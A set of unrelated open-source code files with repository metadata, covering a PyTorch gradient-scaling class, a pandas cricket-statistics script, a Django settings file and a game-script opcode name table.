| 2019-06-17T18:10:58
| 2019-06-17T18:10:58
| 69,974,499
| 0
| 0
| null | 2016-10-04T14:42:32
| 2016-10-04T14:42:32
| null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Hive Appier Framework
# Copyright (c) 2008-2016 Hive Solutions Lda.
#
# This file is part of Hive Appier Framework.
#
# Hive Appier Framework is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by the Apache
# Foundation, either version 2.0 of the License, or (at your option) any
# later version.
#
# Hive Appier Framework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License along with
# Hive Appier Framework. If not, see <http://www.apache.org/licenses/>.
__version__ = "1.0.0"
""" The version of the module """
__revision__ = "$LastChangedRevision$"
""" The revision number of the module """
__date__ = "$LastChangedDate$"
""" The last change date of the module """
__copyright__ = "Copyright (c) 2008-2016 Hive Solutions Lda."
""" The copyright for the module """
__license__ = "Apache License, Version 2.0"
""" The license for the module """
|
[
"joamag@gmail.com"
] |
joamag@gmail.com
|
5baf5f4ab1ce0f06bf39227bd60e30bfe38afa7f
|
bcbf1ea1c0c900e6d351bedcbf70025f7da1495f
|
/torch/cuda/amp/grad_scaler.py
|
dbb6371d633f10fefae1fe7541410cc06bd95aa8
|
[
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
taohe/pytorch
|
aeaca1ffd66b389535fd7b16eca61ab486c629a5
|
f5f1e5e7f66502a6a3f53f22f5034fdef8f040e9
|
refs/heads/master
| 2021-02-05T14:50:52.607646
| 2020-02-28T07:43:39
| 2020-02-28T07:48:09
| 243,793,286
| 0
| 0
|
NOASSERTION
| 2020-02-28T15:26:36
| 2020-02-28T15:26:36
| null |
UTF-8
|
Python
| false
| false
| 20,996
|
py
|
import torch
from collections import defaultdict
from torch._six import container_abcs
class _MultiDeviceReplicator(object):
"""
Lazily serves copies of a tensor to requested devices. Copies are cached per-device.
"""
def __init__(self, master_tensor):
assert master_tensor.is_cuda
self.master = master_tensor
self._per_device_tensors = {}
def get(self, device):
retval = self._per_device_tensors.get(device, None)
if retval is None:
retval = self.master.to(device=device, non_blocking=True, copy=True)
self._per_device_tensors[device] = retval
return retval
class GradScaler(object):
"""
An instance ``scaler`` of :class:`GradScaler` helps perform the steps of gradient scaling
conveniently.
* ``scaler.scale(loss)`` multiplies a given loss by ``scaler``'s current scale factor.
* ``scaler.step(optimizer)`` safely unscales gradients and calls ``optimizer.step()``.
* ``scaler.update()`` updates ``scaler``'s scale factor.
Typical use::
# Creates a GradScaler once at the beginning of training.
scaler = GradScaler()
for epoch in epochs:
for input, target in data:
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
# Scales the loss, and calls backward() on the scaled loss to create scaled gradients.
scaler.scale(loss).backward()
# scaler.step() first unscales the gradients of the optimizer's assigned params.
# If these gradients do not contain infs or NaNs, optimizer.step() is then called,
# otherwise, optimizer.step() is skipped.
scaler.step(optimizer)
# Updates the scale for next iteration.
scaler.update()
See the :ref:`Gradient Scaling Examples<gradient-scaling-examples>` for usage in more complex cases like
gradient clipping, gradient penalty, and multiple losses/optimizers.
``scaler`` dynamically estimates the scale factor each iteration. To minimize gradient underflow,
a large scale factor should be used. However, ``torch.float16`` values can "overflow" (become inf or NaN) if
the scale factor is too large. Therefore, the optimal scale factor is the largest factor that can be used
without incurring inf or NaN gradient values.
``scaler`` approximates the optimal scale factor over time by checking the gradients for infs and NaNs during every
``scaler.step(optimizer)`` (or optional separate ``scaler.unscale_(optimizer)``, see :meth:`unscale_`).
* If infs/NaNs are found, ``scaler.step(optimizer)`` skips the underlying ``optimizer.step()`` (so the params
themselves remain uncorrupted) and ``update()`` multiplies the scale by ``backoff_factor``.
* If no infs/NaNs are found, ``scaler.step(optimizer)`` runs the underlying ``optimizer.step()`` as usual.
If ``growth_interval`` unskipped iterations occur consecutively, ``update()`` multiplies the scale by
``growth_factor``.
The scale factor often causes infs/NaNs to appear in gradients for the first few iterations as its
value calibrates. ``scaler.step`` will skip the underlying ``optimizer.step()`` for these
iterations. After that, step skipping should occur rarely (once every few hundred or thousand iterations).
Arguments:
init_scale (float, optional, default=2.**16): Initial scale factor.
growth_factor (float, optional, default=2.0): Factor by which the scale is multiplied during
:meth:`update` if no inf/NaN gradients occur for ``growth_factor`` consecutive iterations.
backoff_factor (float, optional, default=0.5): Factor by which the scale is multiplied during
:meth:`update` if inf/NaN gradients occur in an iteration.
growth_interval (int, optional, default=2000): Number of consecutive iterations without inf/NaN gradients
that must occur for the scale to be multiplied by ``growth_factor``.
enabled (bool, optional, default=True): If ``False``, disables gradient scaling. :meth:`step` simply
invokes the underlying ``optimizer.step()``, and other methods become no-ops.
"""
# Python 2 doesn't support enums.
READY = 0
UNSCALED = 1
STEPPED = 2
def __init__(self,
init_scale=2.**16,
growth_factor=2.0,
backoff_factor=0.5,
growth_interval=2000,
enabled=True):
self._enabled = enabled
if enabled:
assert growth_factor > 1.0, "The growth factor must be > 1.0."
assert backoff_factor < 1.0, "The backoff factor must be < 1.0."
self._init_scale = init_scale
# self._scale will be lazily initialized during the first call to scale()
self._scale = None
self._growth_factor = growth_factor
self._backoff_factor = backoff_factor
self._growth_interval = growth_interval
self._init_growth_tracker = 0
# self._growth_tracker will be lazily initialized during the first call to scale()
self._growth_tracker = None
READY = self.READY
self._per_optimizer_states = defaultdict(lambda: {"stage": READY, "found_inf_per_device": {}})
def _check_scale_growth_tracker(self, funcname):
fix = "This may indicate your script did not use scaler.scale(loss or outputs) earlier in the iteration."
assert self._scale is not None, "Attempted {} but _scale is None. ".format(funcname) + fix
assert self._growth_tracker is not None, "Attempted {} but _growth_tracker is None. ".format(funcname) + fix
def _lazy_init_scale_growth_tracker(self, dev):
assert self._growth_tracker is None, "_growth_tracker initialized before _scale"
self._scale = torch.full((1,), self._init_scale, dtype=torch.float32, device=dev)
self._growth_tracker = torch.full((1,), self._init_growth_tracker, dtype=torch.int32, device=dev)
def scale(self, outputs):
"""
Multiplies ('scales') a tensor or list of tensors by the scale factor.
Arguments:
outputs (Tensor or iterable of Tensors): Outputs to scale.
Returns:
Scaled outputs. If this instance of :class:`GradScaler` is not enabled, outputs are returned unmodified.
"""
if not self._enabled:
return outputs
# Short-circuit for the common case.
if isinstance(outputs, torch.Tensor):
assert outputs.is_cuda
if self._scale is None:
self._lazy_init_scale_growth_tracker(outputs.device)
return outputs * self._scale.to(device=outputs.device, non_blocking=True)
# Invoke the more complex machinery only if we're treating multiple outputs.
stash = [None] # trick to hold a reference that can be overwritten at any level of the recursion below.
def apply_scale(val):
if isinstance(val, torch.Tensor):
assert val.is_cuda
if self._scale is None:
self._lazy_init_scale_growth_tracker(val.device)
if stash[0] is None:
stash[0] = _MultiDeviceReplicator(self._scale)
return val * stash[0].get(val.device)
elif isinstance(val, container_abcs.Iterable):
return type(val)(apply_scale(v) for v in val)
else:
raise ValueError("outputs must be a Tensor or an iterable of Tensors")
return apply_scale(outputs)
def _unscale_grads_(self, optimizer, inv_scale, found_inf, allow_fp16):
per_device_inv_scale = _MultiDeviceReplicator(inv_scale)
per_device_found_inf = _MultiDeviceReplicator(found_inf)
for group in optimizer.param_groups:
for param in group["params"]:
if param.grad is not None:
if (not allow_fp16) and param.grad.dtype == torch.float16:
raise ValueError("Attempting to unscale FP16 gradients.")
else:
torch._amp_non_finite_check_and_unscale_(param.grad,
per_device_found_inf.get(param.grad.device),
per_device_inv_scale.get(param.grad.device))
return per_device_found_inf._per_device_tensors
def unscale_(self, optimizer):
"""
Divides ("unscales") the optimizer's gradient tensors by the scale factor.
:meth:`unscale_` is optional, serving cases where you need to
:ref:`modify or inspect gradients<working-with-unscaled-gradients>`
between the backward pass(es) and :meth:`step`.
If :meth:`unscale_` is not called explicitly, gradients will be unscaled automatically during :meth:`step`.
Simple example, using :meth:`unscale_` to enable clipping of unscaled gradients::
...
scaler.scale(loss).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
scaler.step(optimizer)
scaler.update()
Arguments:
optimizer (torch.optim.Optimizer): Optimizer that owns the gradients to be unscaled.
.. note::
:meth:`unscale_` does not incur a CPU-GPU sync.
.. warning::
:meth:`unscale_` should only be called once per optimizer per :meth:`step` call,
and only after all gradients for that optimizer's assigned parameters have been accumulated.
Calling :meth:`unscale_` twice for a given optimizer between each :meth:`step` triggers a RuntimeError.
"""
if not self._enabled:
return
self._check_scale_growth_tracker("unscale_")
optimizer_state = self._per_optimizer_states[id(optimizer)]
if optimizer_state["stage"] == self.UNSCALED:
raise RuntimeError("unscale_() has already been called on this optimizer since the last update().")
elif optimizer_state["stage"] == self.STEPPED:
raise RuntimeError("unscale_() is being called after step().")
# FP32 division can be imprecise for certain compile options, so we carry out the reciprocal in FP64.
inv_scale = self._scale.double().reciprocal().float()
found_inf = torch.full((1,), 0.0, dtype=torch.float32, device=self._scale.device)
optimizer_state["found_inf_per_device"] = self._unscale_grads_(optimizer, inv_scale, found_inf, False)
optimizer_state["stage"] = self.UNSCALED
def step(self, optimizer, *args, **kwargs):
"""
:meth:`step` carries out the following two operations:
1. Internally invokes ``unscale_(optimizer)`` (unless :meth:`unscale_` was explicitly called for ``optimizer``
earlier in the iteration). As part of the :meth:`unscale_`, gradients are checked for infs/NaNs.
2. If no inf/NaN gradients are found, invokes ``optimizer.step()`` using the unscaled
gradients. Otherwise, ``optimizer.step()`` is skipped to avoid corrupting the params.
``*args`` and ``**kwargs`` are forwarded to ``optimizer.step()``.
Arguments:
optimizer (torch.optim.Optimizer): Optimizer that applies the gradients.
args: Any arguments.
kwargs: Any keyword arguments.
Returns:
The return value of ``optimizer.step(*args, **kwargs)``.
.. warning::
Closure use is not currently supported.
"""
if (not self._enabled):
return optimizer.step(*args, **kwargs)
if "closure" in kwargs:
raise RuntimeError("Closure use is not currently supported if GradScaler is enabled.")
self._check_scale_growth_tracker("step")
optimizer_state = self._per_optimizer_states[id(optimizer)]
if optimizer_state["stage"] == self.STEPPED:
raise RuntimeError("step() has already been called since the last update().")
retval = None
if (hasattr(optimizer, "_step_supports_amp_scaling") and optimizer._step_supports_amp_scaling):
# This optimizer has customized scale-handling logic, so we can call optimizer.step() directly.
# The contract with custom optimizers is that their step() should accept an additional,
# optional grad_scaler kwarg. We append self to the kwargs so the custom optimizer has full information:
# it can query its own state, invoke unscale_ on itself, etc
retval = optimizer.step(*args, **dict(kwargs, grad_scaler=self))
optimizer_state["stage"] == self.STEPPED
return retval
if optimizer_state["stage"] == self.READY:
self.unscale_(optimizer)
assert len(optimizer_state["found_inf_per_device"]) > 0, "No inf checks were recorded for this optimizer."
if not sum(v.item() for v in optimizer_state["found_inf_per_device"].values()):
retval = optimizer.step(*args, **kwargs)
optimizer_state["stage"] == self.STEPPED
return retval
def update(self, new_scale=None):
"""
Updates the scale factor.
If any optimizer steps were skipped the scale is multiplied by ``backoff_factor``
to reduce it. If ``growth_interval`` unskipped iterations occurred consecutively,
the scale is multiplied by ``growth_factor`` to increase it.
Passing ``new_scale`` sets the scale directly.
Arguments:
new_scale (float or :class:`torch.cuda.FloatTensor`, optional, default=None): New scale factor.
.. warning::
:meth:`update` should only be called at the end of the iteration, after ``scaler.step(optimizer)`` has
been invoked for all optimizers used this iteration.
"""
if not self._enabled:
return
self._check_scale_growth_tracker("update")
if new_scale is not None:
# Accept a new user-defined scale.
if isinstance(new_scale, float):
self._scale = torch.full((1,), new_scale, dtype=torch.float32, device=self._scale.device)
else:
reason = "new_scale should be a float or a 1-element torch.cuda.FloatTensor with requires_grad=False."
assert isinstance(new_scale, torch.cuda.FloatTensor), reason
assert new_scale.numel() == 1, reason
assert new_scale.requires_grad is False, reason
self._scale = new_scale
else:
# Consume shared inf/nan data collected from optimizers to update the scale.
# If all found_inf tensors are on the same device as self._scale, this operation is asynchronous.
found_infs = [found_inf.to(device=self._scale.device, non_blocking=True)
for state in self._per_optimizer_states.values()
for found_inf in state["found_inf_per_device"].values()]
assert len(found_infs) > 0, "No inf checks were recorded prior to update."
found_inf_combined = found_infs[0]
if len(found_infs) > 1:
for i in range(1, len(found_infs)):
found_inf_combined += found_infs[i]
self._scale = torch._amp_update_scale(self._growth_tracker,
self._scale,
found_inf_combined,
self._growth_factor,
self._backoff_factor,
self._growth_interval)
# To prepare for next iteration, clear the data collected from optimizers this iteration.
self._per_optimizer_states = defaultdict(lambda: {"stage": self.READY, "found_inf_per_device": {}})
def _get_scale_async(self):
return self._scale
def get_scale(self):
"""
Returns:
A Python float containing the current scale, or 1.0 if scaling is disabled.
.. warning::
:meth:`get_scale` incurs a CPU-GPU sync.
"""
if self._enabled:
return self._init_scale if self._scale is None else self._get_scale_async().item()
else:
return 1.0
def get_growth_factor(self):
r"""
Returns:
A Python float containing the scale growth factor.
"""
return self._growth_factor
def set_growth_factor(self, new_factor):
r"""
Arguments:
new_scale (float): Value to use as the new scale growth factor.
"""
self._growth_factor = new_factor
def get_backoff_factor(self):
r"""
Returns:
A Python float containing the scale backoff factor.
"""
return self._backoff_factor
def set_backoff_factor(self, new_factor):
r"""
Arguments:
new_scale (float): Value to use as the new scale backoff factor.
"""
self._backoff_factor = new_factor
def get_growth_interval(self):
r"""
Returns:
A Python int containing the growth interval.
"""
return self._growth_interval
def set_growth_interval(self, new_interval):
r"""
Arguments:
new_interval (int): Value to use as the new growth interval.
"""
self._growth_interval = new_interval
def _get_growth_tracker(self):
if self._enabled:
return self._init_growth_tracker if self._growth_tracker is None else self._growth_tracker.item()
else:
return 0
def is_enabled(self):
r"""
Returns:
A bool indicating whether this instance is enabled.
"""
return self._enabled
def state_dict(self):
r"""
Returns the state of the scaler as a :class:`dict`. It contains five entries:
* ``"scale"`` - a Python float containing the current scale
* ``"growth_factor"`` - a Python float containing the current growth factor
* ``"backoff_factor"`` - a Python float containing the current backoff factor
* ``"growth_interval"`` - a Python int containing the current growth interval
* ``"_growth_tracker"`` - a Python int containing the number of recent consecutive unskipped steps.
If this instance is not enabled, returns an empty dict.
.. note::
If you wish to checkpoint the scaler's state after a particular iteration, :meth:`state_dict`
should be called after :meth:`update`.
"""
return {"scale": self.get_scale(),
"growth_factor": self._growth_factor,
"backoff_factor": self._backoff_factor,
"growth_interval": self._growth_interval,
"_growth_tracker": self._get_growth_tracker()} if self._enabled else {}
def load_state_dict(self, state_dict):
r"""
Loads the scaler state. If this instance is disabled, :meth:`load_state_dict` is a no-op.
Arguments:
state_dict(dict): scaler state. Should be an object returned from a call to :meth:`state_dict`.
"""
if not self._enabled:
return
if len(state_dict) == 0:
raise RuntimeError("The source state dict is empty, possibly because it was saved "
"from a disabled instance of GradScaler.")
self._init_scale = state_dict["scale"]
if self._scale is not None:
self._scale.fill_(state_dict["scale"])
self._growth_factor = state_dict["growth_factor"]
self._backoff_factor = state_dict["backoff_factor"]
self._growth_interval = state_dict["growth_interval"]
self._init_growth_tracker = state_dict["_growth_tracker"]
if self._growth_tracker is not None:
self._growth_tracker.fill_(state_dict["_growth_tracker"])
def _check_inf_per_device(self, optimizer):
self._check_scale_growth_tracker("_check_inf_per_device")
dummy_inv_scale = torch.full((1,), 1.0, dtype=torch.float32, device=self._scale.device)
found_inf = torch.full((1,), 0.0, dtype=torch.float32, device=self._scale.device)
self._per_optimizer_states[id(optimizer)]["found_inf_per_device"] = \
self._unscale_grads_(optimizer, dummy_inv_scale, found_inf, True)
return self._per_optimizer_states[id(optimizer)]["found_inf_per_device"]
def _found_inf_per_device(self, optimizer):
return self._per_optimizer_states[id(optimizer)]["found_inf_per_device"]
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
27d895e9926997b17101009aa6aad3e92ea748bb
|
b25e06d09ac3bcd31f6589c06d72790a96e447d1
|
/IPL/Mixed records and analysis/most_matches.py
|
0be12f7bd21eea213a46e79d4e75675bd029c1f7
|
[] |
no_license
|
forceyash/PythonProjects
|
01aaa16d246bea183028952085ad56b7e19f4b58
|
387b195a61e4cdaa1da96ab38a65bf0b326f11d8
|
refs/heads/master
| 2020-03-24T19:04:01.269194
| 2019-02-28T17:50:52
| 2019-02-28T17:50:52
| 142,907,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 992
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
deliveries = pd.read_csv("C:\\Users\\yash.a.mishra\\AppData\\Local\\Programs\\Python\\Python37\\Machine Learning\\Pandas\\ipl\\deliveries.csv")
#mapper = deliveries.groupby(['match_id', 'inning']).batsman.apply(lambda x: dict(zip(x[~x.duplicated()], np.arange(1, len(x[~x.duplicated()])+1)))).reset_index(name = 'batting_position').rename(columns = {'level_2':'batsman'})
players = pd.DataFrame(columns=("match_id", "player"))
i=0
def func1(x):
batters = x.batsman.unique()
bowlers = x.bowler.unique()
fielder = x.fielder.unique()
All = np.concatenate((batters, bowlers, fielder))
All = pd.Series(np.array(All).tolist()).drop_duplicates()
return pd.DataFrame(data = {"players": All})
mapper = deliveries.groupby('match_id')["batsman", "bowler", "fielder"].apply(lambda x: func1(x)).reset_index().drop("level_1", axis = 1).dropna()
print(mapper.groupby('players').match_id.count().nlargest(30))
|
[
"forceyash@yahoo.com"
] |
forceyash@yahoo.com
|
3798c5835b31c5b38035c561ed16c4a8bb5e76ca
|
49cfa38094989a4762bd1a875af0c1c38f893220
|
/project/settings.py
|
22ee98e17346257203e29e5b56e5c064c1263575
|
[
"MIT"
] |
permissive
|
Rajesh25B/SuperSpace
|
8879e5315792e20bc4790c44dacbbf813a65f5e6
|
86eeb9bd499e21c92a29a44e31985333bd85cd28
|
refs/heads/main
| 2023-03-21T06:38:53.433466
| 2021-03-21T20:21:46
| 2021-03-21T20:21:46
| 349,925,742
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,306
|
py
|
"""
Django settings for project project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fqw=+q3m$s4k2^i0@u394a48h#@0ouq@ai(c+gf5iurf@oq0f^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'bootstrap4',
# local
'accounts',
'posts',
'groups'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR / 'staticfiles'
STATICFILES_DIRS = [
BASE_DIR / 'static',
]
LOGIN_REDIRECT_URL = 'test'
LOGOUT_REDIRECT_URL = 'thanks'
|
[
"basvoju.rajesh@gmail.com"
] |
basvoju.rajesh@gmail.com
|
f2bc31a5e78ba6421224eb8bd9681f9117f2613e
|
25884fc96cabc943f3f4a4525f21d89b260ad279
|
/Source/Falcom/EDAO/Decompiler/Instruction/ScenaOpTableEDAO.py
|
e2b41dad36eb912282f2ebc1ab104ac6169c885b
|
[] |
no_license
|
poragn/Arianrhod
|
67399e7e0678b0988aa3f9b12ccc318c877b3178
|
2f1a7ac4daba1c6f1cf7a29db4b7cddac288d00e
|
refs/heads/master
| 2021-01-20T22:54:54.321842
| 2015-09-20T07:25:45
| 2015-09-20T07:25:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59,541
|
py
|
from Assembler.InstructionTable import *
from Base.EDAOBase import *
from GameData.ItemNameMap import *
def GetOpCode(fs):
return fs.byte()
def WriteOpCode(fs, op):
return fs.wbyte(op)
edao_op_table = InstructionTable(GetOpCode, WriteOpCode, DefaultGetLabelName, CODE_PAGE)
InstructionNames = {}
InstructionNames[0x00] = 'ExitThread'
InstructionNames[0x01] = 'Return'
InstructionNames[0x02] = 'Jc'
InstructionNames[0x03] = 'Jump'
InstructionNames[0x04] = 'Switch'
InstructionNames[0x05] = 'Call'
InstructionNames[0x06] = 'NewScene'
InstructionNames[0x07] = 'IdleLoop'
InstructionNames[0x08] = 'Sleep'
InstructionNames[0x09] = 'SetMapFlags'
InstructionNames[0x0A] = 'ClearMapFlags'
InstructionNames[0x0B] = 'FadeToDark'
InstructionNames[0x0C] = 'FadeToBright'
InstructionNames[0x0D] = 'OP_0D'
InstructionNames[0x0E] = 'Fade'
InstructionNames[0x0F] = 'Battle'
InstructionNames[0x10] = 'OP_10'
InstructionNames[0x11] = 'OP_11'
InstructionNames[0x12] = 'StopSound'
InstructionNames[0x13] = 'OP_13'
InstructionNames[0x14] = 'BlurSwitch'
InstructionNames[0x15] = 'CancelBlur'
InstructionNames[0x16] = 'OP_16'
InstructionNames[0x17] = 'ShowSaveMenu'
InstructionNames[0x19] = 'EventBegin'
InstructionNames[0x1A] = 'EventEnd'
InstructionNames[0x1B] = 'OP_1B'
InstructionNames[0x1C] = 'OP_1C'
InstructionNames[0x1D] = 'SetBarrier'
InstructionNames[0x1E] = 'PlayBGM'
InstructionNames[0x1F] = 'OP_1F'
InstructionNames[0x20] = 'VolumeBGM'
InstructionNames[0x21] = 'OP_21'
InstructionNames[0x22] = 'WaitBGM'
InstructionNames[0x23] = 'Sound'
InstructionNames[0x24] = 'OP_24'
InstructionNames[0x25] = 'OP_25'
InstructionNames[0x26] = 'SoundDistance'
InstructionNames[0x27] = 'SoundLoad'
InstructionNames[0x28] = 'Yield'
InstructionNames[0x29] = 'OP_29'
InstructionNames[0x2A] = 'OP_2A'
InstructionNames[0x2B] = 'OP_2B'
InstructionNames[0x2C] = 'OP_2C'
InstructionNames[0x2D] = 'OP_2D'
InstructionNames[0x2E] = 'AddParty'
InstructionNames[0x2F] = 'RemoveParty'
InstructionNames[0x30] = 'ClearParty'
InstructionNames[0x31] = 'OP_31'
InstructionNames[0x32] = 'OP_32'
InstructionNames[0x35] = 'RemoveCraft'
InstructionNames[0x36] = 'AddCraft'
InstructionNames[0x37] = 'OP_37'
InstructionNames[0x38] = 'OP_38'
InstructionNames[0x39] = 'AddSepith'
InstructionNames[0x3A] = 'SubSepith'
InstructionNames[0x3B] = 'AddMira'
InstructionNames[0x3C] = 'SubMira'
InstructionNames[0x3D] = 'OP_3D'
InstructionNames[0x3E] = 'OP_3E'
InstructionNames[0x3F] = 'AddItemNumber'
InstructionNames[0x40] = 'SubItemNumber'
InstructionNames[0x41] = 'GetItemNumber'
InstructionNames[0x42] = 'OP_42'
InstructionNames[0x43] = 'GetPartyIndex'
InstructionNames[0x44] = 'BeginChrThread'
InstructionNames[0x45] = 'EndChrThread'
InstructionNames[0x46] = 'QueueWorkItem'
InstructionNames[0x47] = 'QueueWorkItem2'
InstructionNames[0x48] = 'WaitChrThread'
InstructionNames[0x49] = 'OP_49'
InstructionNames[0x4A] = 'Event'
InstructionNames[0x4B] = 'OP_4B'
InstructionNames[0x4C] = 'OP_4C'
InstructionNames[0x4D] = 'OP_4D'
InstructionNames[0x4E] = 'RunExpression'
InstructionNames[0x4F] = 'OP_4F'
InstructionNames[0x50] = 'OP_50'
InstructionNames[0x51] = 'OP_51'
InstructionNames[0x52] = 'OP_52'
InstructionNames[0x53] = 'TalkBegin'
InstructionNames[0x54] = 'TalkEnd'
InstructionNames[0x55] = 'AnonymousTalk'
InstructionNames[0x56] = 'OP_56'
InstructionNames[0x57] = 'OP_57'
InstructionNames[0x58] = 'MenuTitle'
InstructionNames[0x59] = 'CloseMessageWindow'
InstructionNames[0x5A] = 'OP_5A'
InstructionNames[0x5B] = 'SetMessageWindowPos'
InstructionNames[0x5C] = 'ChrTalk'
InstructionNames[0x5D] = 'NpcTalk'
InstructionNames[0x5E] = 'Menu'
InstructionNames[0x5F] = 'MenuEnd'
InstructionNames[0x60] = 'OP_60'
InstructionNames[0x61] = 'SetChrName'
InstructionNames[0x62] = 'OP_62'
InstructionNames[0x63] = 'OP_63'
InstructionNames[0x64] = 'OP_64'
InstructionNames[0x65] = 'OP_65'
InstructionNames[0x66] = 'OP_66'
InstructionNames[0x67] = 'OP_67'
InstructionNames[0x68] = 'OP_68'
InstructionNames[0x69] = 'OP_69'
InstructionNames[0x6A] = 'OP_6A'
InstructionNames[0x6B] = 'OP_6B'
InstructionNames[0x6C] = 'SetCameraDistance'
InstructionNames[0x6D] = 'MoveCamera'
InstructionNames[0x6E] = 'OP_6E'
InstructionNames[0x6F] = 'OP_6F'
InstructionNames[0x70] = 'OP_70'
InstructionNames[0x71] = 'OP_71'
InstructionNames[0x72] = 'SetMapObjFlags'
InstructionNames[0x73] = 'ClearMapObjFlags'
InstructionNames[0x74] = 'OP_74'
InstructionNames[0x75] = 'OP_75'
InstructionNames[0x76] = 'SetMapObjFrame'
InstructionNames[0x77] = 'OP_77'
InstructionNames[0x78] = 'OP_78'
InstructionNames[0x79] = 'OP_79'
InstructionNames[0x7A] = 'SetEventSkip'
InstructionNames[0x7B] = 'OP_7B'
InstructionNames[0x7D] = 'OP_7D'
InstructionNames[0x82] = 'OP_82'
InstructionNames[0x83] = 'SetChrChip'
InstructionNames[0x84] = 'OP_84'
InstructionNames[0x85] = 'LoadEffect'
InstructionNames[0x86] = 'PlayEffect'
InstructionNames[0x87] = 'OP_87'
InstructionNames[0x88] = 'StopEffect'
InstructionNames[0x89] = 'OP_89'
InstructionNames[0x8A] = 'OP_8A'
InstructionNames[0x8B] = 'OP_8B'
InstructionNames[0x8C] = 'SetChrChipByIndex'
InstructionNames[0x8D] = 'SetChrSubChip'
InstructionNames[0x8E] = 'OP_8E'
InstructionNames[0x8F] = 'SetChrPos'
InstructionNames[0x90] = 'OP_90'
InstructionNames[0x91] = 'TurnDirection'
InstructionNames[0x92] = 'OP_92'
InstructionNames[0x93] = 'OP_93'
InstructionNames[0x94] = 'OP_94'
InstructionNames[0x95] = 'OP_95'
InstructionNames[0x96] = 'OP_96'
InstructionNames[0x97] = 'OP_97'
InstructionNames[0x98] = 'OP_98'
InstructionNames[0x99] = 'OP_99'
InstructionNames[0x9A] = 'OP_9A'
InstructionNames[0x9B] = 'OP_9B'
InstructionNames[0x9C] = 'OP_9C'
InstructionNames[0x9D] = 'OP_9D'
InstructionNames[0x9E] = 'OP_9E'
InstructionNames[0x9F] = 'OP_9F'
InstructionNames[0xA0] = 'OP_A0'
InstructionNames[0xA1] = 'OP_A1'
InstructionNames[0xA2] = 'SetChrFlags'
InstructionNames[0xA3] = 'ClearChrFlags'
InstructionNames[0xA4] = 'SetChrBattleFlags'
InstructionNames[0xA5] = 'ClearChrBattleFlags'
InstructionNames[0xA6] = 'OP_A6'
InstructionNames[0xA7] = 'OP_A7'
InstructionNames[0xA8] = 'OP_A8'
InstructionNames[0xA9] = 'SetScenarioFlags'
InstructionNames[0xAA] = 'ClearScenarioFlags'
InstructionNames[0xAB] = 'OP_AB'
InstructionNames[0xAC] = 'OP_AC'
InstructionNames[0xAD] = 'OP_AD'
InstructionNames[0xAE] = 'OP_AE'
InstructionNames[0xAF] = 'OP_AF'
InstructionNames[0xB2] = 'OP_B2'
InstructionNames[0xB3] = 'OutputDebugInt'
InstructionNames[0xB4] = 'OP_B4'
InstructionNames[0xB5] = 'OP_B5'
InstructionNames[0xB6] = 'LoadOps'
InstructionNames[0xB7] = 'ModifyEventFlags'
InstructionNames[0xB8] = 'PlayMovie'
InstructionNames[0xB9] = 'OP_B9'
InstructionNames[0xBA] = 'ReplaceBGM'
InstructionNames[0xBC] = 'OP_BC'
InstructionNames[0xBD] = 'UseItem'
InstructionNames[0xBE] = 'OP_BE'
InstructionNames[0xBF] = 'OP_BF'
